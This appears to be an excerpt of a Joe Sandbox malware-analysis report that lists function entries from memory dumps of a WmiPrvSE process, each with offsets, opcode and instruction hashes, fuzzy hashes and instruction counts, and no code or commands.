Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f150d806756b1b7561fe14f0c9c05584fa662df087039a761ccfd5994d6adb
Instruction ID: dd930f106ed227fe8a536733d39ac4d4ed77178070cd3ba8f9699d0091243ccc
Opcode Fuzzy Hash: b0f150d806756b1b7561fe14f0c9c05584fa662df087039a761ccfd5994d6adb
Instruction Fuzzy Hash: 0F313A21B0DA291BE368B7BC68AA5F477C1DF58336F0401FEE41EC71E7CC1868418285

Function 00007FFD9BE7A1BB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 132a8692bda8b2c46e19b52a0a8e37778b9d04d4144c0407b36b0a08b978370b
Instruction ID: beda46092ebb93f741a3beab70e1f705a7108db6ec9f84709c5eb2175899fb8f
Opcode Fuzzy Hash: 132a8692bda8b2c46e19b52a0a8e37778b9d04d4144c0407b36b0a08b978370b
Instruction Fuzzy Hash: FE31643160D9498FDFA8EF18C4A5DA4B7E2FF6931170402ADD14EC76A2DE35E845CB81

Function 00007FFD9BE7011B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2800f31dc24f24a5d3095737b04abde507fd23ebaab4722d97f433dfff663f00
Instruction ID: f5a0257e5241f03054750900b167e0e6128bf16df2dcebd876ebb10e630db00e
Opcode Fuzzy Hash: 2800f31dc24f24a5d3095737b04abde507fd23ebaab4722d97f433dfff663f00
Instruction Fuzzy Hash: 5A31623161C9498FDF98EF28C4A5EA473E1FF68714B0442A9D05EC7196DE25FC85CB81

Function 00007FFD9BE75A01 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab288f59d7d9f9ae4359efa1c9e240b805529b0bbb58f45fda22c58c6ea4f3ac
Instruction ID: d848499e32e623654be237ea80cfd20d47ea488b4b4e40133feefd0e41190d88
Opcode Fuzzy Hash: ab288f59d7d9f9ae4359efa1c9e240b805529b0bbb58f45fda22c58c6ea4f3ac
Instruction Fuzzy Hash: 1A319071E1EA8E9FDBA5DBA4C8E04AC7BF0FF15300F05017BD009D7292DA2A69068B50

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5fc60a2c14ab6c6f07906622f4a52f0d060f33387a377a896bbebb4dba020cf
Instruction ID: 1943502c2e4162ebc63d816a28d19533dd5bd05a3cfe0dec5adbf0481f187171
Opcode Fuzzy Hash: e5fc60a2c14ab6c6f07906622f4a52f0d060f33387a377a896bbebb4dba020cf
Instruction Fuzzy Hash: 1B313821B1A92D0FE398F77C84AAA7577C2EF59325B0400BDE44EC72E7DD68AC018641

Function 00007FFD9C20384D Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867f7c0c553bb2c4a58cd8a74f1b6f6ef58f14893a43d593efae093ca3b5d598
Instruction ID: df461edb385fcae46babef0304b43cd92b03d593960332024b0373b557daadac
Opcode Fuzzy Hash: 867f7c0c553bb2c4a58cd8a74f1b6f6ef58f14893a43d593efae093ca3b5d598
Instruction Fuzzy Hash: DA318F31B18A1A8FDB68DB98D4A16A8F3B2FF99710B514139D04ED3791CF34B812CB80

Function 00007FFD9BE7730B Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c89d126cdf6fe5ae66434e9ae9f17e439579130944a3009dabb1e0db5f91d56
Instruction ID: ccd066c9801ea8ea3fe23ed98f50b375877e7639439b1e5fad8af36ff38239a4
Opcode Fuzzy Hash: 2c89d126cdf6fe5ae66434e9ae9f17e439579130944a3009dabb1e0db5f91d56
Instruction Fuzzy Hash: 27315C71B1990E9FDB64DA98D4E19ACB3E6FF98310B528139D00EC3292CF25BC12C780

Function 00007FFD9C20390A Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8f961be3c4f2db5bdb0aee380878a4fec0485348c62420b1183f62063beff2
Instruction ID: a2193fdcd46030e09402f114aaa0fa4c3ec9711a1165a12c88d8f85b7adfb867
Opcode Fuzzy Hash: 3a8f961be3c4f2db5bdb0aee380878a4fec0485348c62420b1183f62063beff2
Instruction Fuzzy Hash: 6121E861B1DE4F4FEB68D7A884623E8B7E1EF58354F64027AD05DD72C3EE1568028781

Function 00007FFD9C2064E5 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8f0a516d8ef8ef865565aa1a2c631218053f73e21ff73602665e671820eff1
Instruction ID: 377c50664dd051b4ad509a3928bc4af84b5b343637de711f09da53a99f4e7b55
Opcode Fuzzy Hash: 1b8f0a516d8ef8ef865565aa1a2c631218053f73e21ff73602665e671820eff1
Instruction Fuzzy Hash: A5311A70A0C94BCFEBB8DB9484A56BD7BB1FF44340F50017BE80ED6695DE39A9408B41

Function 00007FFD9BE7F785 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79b11ccb9b9ef9d568f9d49ffe11788ece1c4a499173dbbf7c2e8e912abde7f9
Instruction ID: 4dab2d95dd259d7ee913211238e5c8d726a7e1e8096b2b4af562c2d11264e026
Opcode Fuzzy Hash: 79b11ccb9b9ef9d568f9d49ffe11788ece1c4a499173dbbf7c2e8e912abde7f9
Instruction Fuzzy Hash: FA315D30E1E58ECFEB78DB9484A15BD77A5FF44300F5502BAD01ED71A1DB3AAA409781

Function 00007FFD9BE79F85 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eafbdf3e412bea6618c9fc69a097b8f1c0df633a75a8672b914a6bfd8dd48ea
Instruction ID: 8cbd87e14878de1cb82da1d57ff2055a7d546ecb9339e9b04337ba66643f2ab9
Opcode Fuzzy Hash: 6eafbdf3e412bea6618c9fc69a097b8f1c0df633a75a8672b914a6bfd8dd48ea
Instruction Fuzzy Hash: AF313B30A0A94EDFEBB8DB9484A59BD77B6FF44300F51057AD00ED71A1DA3A6A409781

Function 00007FFD9BAB11A1 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2048205a5e2395ba523d035b429e60f184ca1cb524faddd19f42c2b022df1c9b
Instruction ID: d868adf29393d77592e699b1a8184ad1aa86ccf9ce780fe751ecd0a79a52e757
Opcode Fuzzy Hash: 2048205a5e2395ba523d035b429e60f184ca1cb524faddd19f42c2b022df1c9b
Instruction Fuzzy Hash: 0E31D730A0D65E8FDB55EBA8C8659B87BF0FF2A300F0505BBC059C71B2DE68A940CB40

Function 00007FFD9BAB27C5 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833a9ea1a58ab0c8b1c06df2f7416fe7786d1b14b1721947e55527b90ccc28d3
Instruction ID: f6df770dea844f8b9c844f04a7cb1bbbc4ccd90785d3beb2028b7a7bee44cdb4
Opcode Fuzzy Hash: 833a9ea1a58ab0c8b1c06df2f7416fe7786d1b14b1721947e55527b90ccc28d3
Instruction Fuzzy Hash: 5A314320B19A1D4FEBB4EBD898B47B86691EF58301F5541B6D41DD31E2DE78AE808F04

Function 00007FFD9BE7FA6D Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee07da3b02d0c513f2af9ee7b866eb442b529f9f0303425362b4e2f8fb7bc04e
Instruction ID: ba133bf0194e68649c425a544de6dd061c52e578a0636f2bb39b6548e83e8280
Opcode Fuzzy Hash: ee07da3b02d0c513f2af9ee7b866eb442b529f9f0303425362b4e2f8fb7bc04e
Instruction Fuzzy Hash: C021213160C9098FDF98EF18C4A5EA577E2FBA931170442AED04EC72A2DE35E845CB81

Function 00007FFD9BE773DF Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3649850f9e59310a4d2fd77fe30a8460ee0e54854f1d16bc8508b63522c59c0
Instruction ID: 870830cc898d7e897944621ea296362d5aa771fbefac7b965bd247c324c852f2
Opcode Fuzzy Hash: c3649850f9e59310a4d2fd77fe30a8460ee0e54854f1d16bc8508b63522c59c0
Instruction Fuzzy Hash: AC21F871F0E64E4FE764E7A898A22F8BBE5FF55310F250179D01DC72E2EE2969068344

Function 00007FFD9BE78E70 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1253004a4654cb7d8f699263ddb686ca3642851bbc500f44f031a452a04114cc
Instruction ID: 9c69ca77bbd38a9fae58a8bf78b257c5c02399bd2be81e7976059235532ed8c0
Opcode Fuzzy Hash: 1253004a4654cb7d8f699263ddb686ca3642851bbc500f44f031a452a04114cc
Instruction Fuzzy Hash: 8F317810A1E0EE4AF33D821948B05747B66FF613107194AFBD09B8B4EBC92CB981F380

Function 00007FFD9BE7E670 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1016bbe7d164b979bfc1e509c41cd9e5d024c740bc7f1b34698725f423801e
Instruction ID: c6a0522e457a1f1da69d52d689827b3fa847aba657abeb59aeeabb2099c6ed2c
Opcode Fuzzy Hash: ee1016bbe7d164b979bfc1e509c41cd9e5d024c740bc7f1b34698725f423801e
Instruction Fuzzy Hash: 8D316910A1E1DA8BF33A835884F45707B69FF5130171E47BAE09A8B0E7C92DB941D341

Function 00007FFD9C2032C3 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c38220b247874ee960a9c6d3f0e94cea8d8b4bd5ee213afc89d0b5df3c0394e
Instruction ID: 61398a638d963b0a44e5f7fd275c1366a139c21872687136107327b0ad4d8b21
Opcode Fuzzy Hash: 0c38220b247874ee960a9c6d3f0e94cea8d8b4bd5ee213afc89d0b5df3c0394e
Instruction Fuzzy Hash: FB218431B189094FDBA8EB58D865A78B3E1FF5D325F50017AD04ED3691CA25AC418B40

Function 00007FFD9C2053D1 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7404e9127de984ed1f9ec9fded8d6da304b5804d653bf4eb1318fd3937a0672
Instruction ID: 562d3b09cef788e6f9462657c192a7b51cfd2e3cbf82bb3094b114e83c4a576c
Opcode Fuzzy Hash: a7404e9127de984ed1f9ec9fded8d6da304b5804d653bf4eb1318fd3937a0672
Instruction Fuzzy Hash: F1313B20A1D5974BF339CF5844B46B47B71EF41302B1846FBC0DACB68BC96CB881A345

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9964a84eb9199d5996b746d1077e362374d00cae5bae178666860cae1fa5835a
Instruction ID: e8457306c7b96e927a11ed6a0577b502be781874836bf288fcd07340d0de9a13
Opcode Fuzzy Hash: 9964a84eb9199d5996b746d1077e362374d00cae5bae178666860cae1fa5835a
Instruction Fuzzy Hash: 7121F831B0D75D8FE332D7A588612ED7BB0EF42324F1641B7D055C71E2DA7816458B45

Function 00007FFD9C203327 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ee25cf59db2b9c667e9fa6c631742af9557935e05dd7d526ac53e21882c61c
Instruction ID: e114d9bd9824d18d6c4834695b91aa7e53de3b9fa97ede825fe1ae960ca92e7b
Opcode Fuzzy Hash: 93ee25cf59db2b9c667e9fa6c631742af9557935e05dd7d526ac53e21882c61c
Instruction Fuzzy Hash: 89113331718A188FCB98DB1CE855AA9B3E2FF99315F5042AAD04ED7266CA31AC418B40

Function 00007FFD9C203789 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1c89d5c252d0dd2ef5c90007cb95f0aa44978c5d55f69db7f75f34667f0427
Instruction ID: 6746b269ed4f64e9fbc66a50a13b689cf6a1e93a41afc8c4aa7f490ed254a13c
Opcode Fuzzy Hash: 0a1c89d5c252d0dd2ef5c90007cb95f0aa44978c5d55f69db7f75f34667f0427
Instruction Fuzzy Hash: 49117821B0DA9E5FEB30D6A488653B977F4EF4A381F11007BE04AE7292CD286C028351

Function 00007FFD9BE75F7A Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8139096828874a02e42f6d4533075d0ad0d9b6c060d0427c6e72e8b99b019319
Instruction ID: ccdd87077a5a7f21feeb44e2784c24ecb3dea0f9849ce698de3097e3215d8a3a
Opcode Fuzzy Hash: 8139096828874a02e42f6d4533075d0ad0d9b6c060d0427c6e72e8b99b019319
Instruction Fuzzy Hash: 2F21AA11A0F2CA4FF33B52B458B45B87E55DF42264F1A01FAD48A8B4E3DD4E1645A383

Function 00007FFD9C2027F9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8aa779d4b4cf0d12f7a05d76609dc2ac3f084a024c2690d20cdc95d128c12b1
Instruction ID: 7b5a592e4a7f4ab4657593478c71dfac0fc3b81923b1c8bd0106a749f2bafcbd
Opcode Fuzzy Hash: c8aa779d4b4cf0d12f7a05d76609dc2ac3f084a024c2690d20cdc95d128c12b1
Instruction Fuzzy Hash: B7213D74E1991A9FDFACDB58C466AADB7B1FF58314F0041BED00EE3292CE34A9418B40

Function 00007FFD9BAB32B0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24659a79a8c5756f4173b3ea030de9bbf0f936390be07098eeef696e3cac135
Instruction ID: 5ff8d8476c9ebb300d855cc5b23bc8d9666dae772560593af7c40320bea7bc73
Opcode Fuzzy Hash: e24659a79a8c5756f4173b3ea030de9bbf0f936390be07098eeef696e3cac135
Instruction Fuzzy Hash: 8A215371E0992D8FDB69DB44C8A1BE973E1FF54314F4100AAD45ED72A2CA796E80CF81

Function 00007FFD9C205400 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a7b27067d30e90662d1515be7d4ee5b5ddab4110524be7a6c9c011a1a6072c
Instruction ID: 9def35b55dc4302d31ee201f60f1673310675624402514d915a6ac30b5de313c
Opcode Fuzzy Hash: c8a7b27067d30e90662d1515be7d4ee5b5ddab4110524be7a6c9c011a1a6072c
Instruction Fuzzy Hash: 1911DD20A1D86746F638CE4444F46F87271EF50343B24467BD09B9B68AC97CF8C1A784

Function 00007FFD9C204480 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9893d4e3c7c2921bec3fb8cb5e9260afbdfc152390920d41a9dd5d80463ef81a
Instruction ID: eefc34021da2691200c6ff31d1ea0079f6ed2614587d20ebc26e8fc3ecdf42c5
Opcode Fuzzy Hash: 9893d4e3c7c2921bec3fb8cb5e9260afbdfc152390920d41a9dd5d80463ef81a
Instruction Fuzzy Hash: 0711E921718D0D4BDA64EB59A4616FAB3E1EF58315F900A7EE18EC71E2CD25F9068780

Function 00007FFD9C2032CC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bab7a6f88dc453f4c371c749d32f63cbfe37328b71d3446f45e2e82dbaa7a2
Instruction ID: 43b9ad487f665a15e076528b0876116afab6d3edb16cae1eab2eb5292fc0438d
Opcode Fuzzy Hash: 08bab7a6f88dc453f4c371c749d32f63cbfe37328b71d3446f45e2e82dbaa7a2
Instruction Fuzzy Hash: 61116531B18A0C8FD798DB58D8A6AB9B3E1FF59225F50027FD04ED76A5CB316C418B40

Function 00007FFD9C2024E9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9214337ae3b6c6945199a036fd2bd7446b9abc4d2658f77471c6d5623fb9abd5
Instruction ID: fe657d0075e51d74ab67ab480605a0d6949b6942db3974417c45a3aa6dc51525
Opcode Fuzzy Hash: 9214337ae3b6c6945199a036fd2bd7446b9abc4d2658f77471c6d5623fb9abd5
Instruction Fuzzy Hash: 36119D52F4E5A747F67DC5E828712BC3E306F447A0F5902BBD44E8A2D3DC4C2881669A

Function 00007FFD9C2042FE Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317841167a4fde1e5e5f8b0dae7fc5697658c9ae6ab86cc66fa8ecd49d17ed6d
Instruction ID: 431ff7382817e9fca9a316d2ab4dba37a78c8bf36e2dec3404dc901a876ac2c2
Opcode Fuzzy Hash: 317841167a4fde1e5e5f8b0dae7fc5697658c9ae6ab86cc66fa8ecd49d17ed6d
Instruction Fuzzy Hash: AA01853231880A4BDB14CA4CE4A43F5B391EB86320F60067FDA49C32D0CAA6A8468780

Function 00007FFD9C20281E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b142d7dddf19430abd8cfd3001b45e3fa928e8356057a66b7c7e34dae5f4c22d
Instruction ID: e198c29f23e7dd20341014e80cd0c5772b2347aa995d343522b4d3c48607c896
Opcode Fuzzy Hash: b142d7dddf19430abd8cfd3001b45e3fa928e8356057a66b7c7e34dae5f4c22d
Instruction Fuzzy Hash: 91110A34A1891E8FDFACDB58C465AADB7B1FF58315F4001BEE00EE3691CE35A9808B00

Function 00007FFD9BE762E0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f244d1fbce24d959cc447a85a3a3f764691c788cc35d18bd6380f721f29658fd
Instruction ID: 8aa7bc2f7e73a4bdbb761213fcfd8df54032528f1bd08151a6a9375718ae782d
Opcode Fuzzy Hash: f244d1fbce24d959cc447a85a3a3f764691c788cc35d18bd6380f721f29658fd
Instruction Fuzzy Hash: B9110A70A1991D9FDFACDB58C4A5AACB7A1EF58315F0101BED04EE3691CE75A9418B00

Function 00007FFD9C201DD8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b8662e8bf47041457c7ea98093a9fd37cb9195cf59ae53cc5cc83ca08a92d8
Instruction ID: a7f4bf919f5660896a56feb715537cc3f14390cc05e620a1d830bd6f4c137d33
Opcode Fuzzy Hash: e6b8662e8bf47041457c7ea98093a9fd37cb9195cf59ae53cc5cc83ca08a92d8
Instruction Fuzzy Hash: ED11CE6148E3C14FD3539BB488694927FF0AE1712430E81EBC4C9CF4A3D65E484AC722

Function 00007FFD9BE7D720 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35ff581326c78771736daf0085e017af32b206afa78f6b4c1aa0e0d817bfdd77
Instruction ID: 6b4e2bdb1f8ae053dbe480c173cb754b7ff1d6081de5bb3cca758f295f5fb365
Opcode Fuzzy Hash: 35ff581326c78771736daf0085e017af32b206afa78f6b4c1aa0e0d817bfdd77
Instruction Fuzzy Hash: CC112521729E4C0BDB64EB6494A06FA7391EF84314F500A7EE44EC71E2DD26A94A8380

Function 00007FFD9BE77F20 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117bd64c1bdefacb15186fe1c35da96b19b165c89526c3c6f2362cd0122d0bd2
Instruction ID: e831714b7c45293730c27fd47c8d1afedbc8ac7cb9d043fe9e1a9743fd9906bf
Opcode Fuzzy Hash: 117bd64c1bdefacb15186fe1c35da96b19b165c89526c3c6f2362cd0122d0bd2
Instruction Fuzzy Hash: E9112C21729E4C4BDB65DB6494A4AFD77D1EF45214F50067DD44EC71D2CD29A9058380

Function 00007FFD9BE714B9 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

